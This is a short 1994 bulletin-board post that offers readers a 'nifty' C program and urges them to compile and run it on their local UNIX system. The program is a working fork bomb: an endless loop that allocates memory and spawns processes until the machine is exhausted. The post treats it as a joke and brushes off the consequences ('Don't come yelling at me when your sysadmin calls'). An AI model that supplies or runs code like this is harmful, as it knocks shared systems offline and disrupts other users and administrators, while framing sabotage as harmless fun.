From: cosmos@yabbs To: all@yabbs Subject: A nifty little C program... Date: Mon Jan 31 11:19:14 1994 Here's something for a fun day on your local UNIX system,... main() { for(;;) { malloc(1000); fork(); } } type that puppy in and then compile it and then run it. Don't come yelling at me when your sysadmin calls you up... Cosmos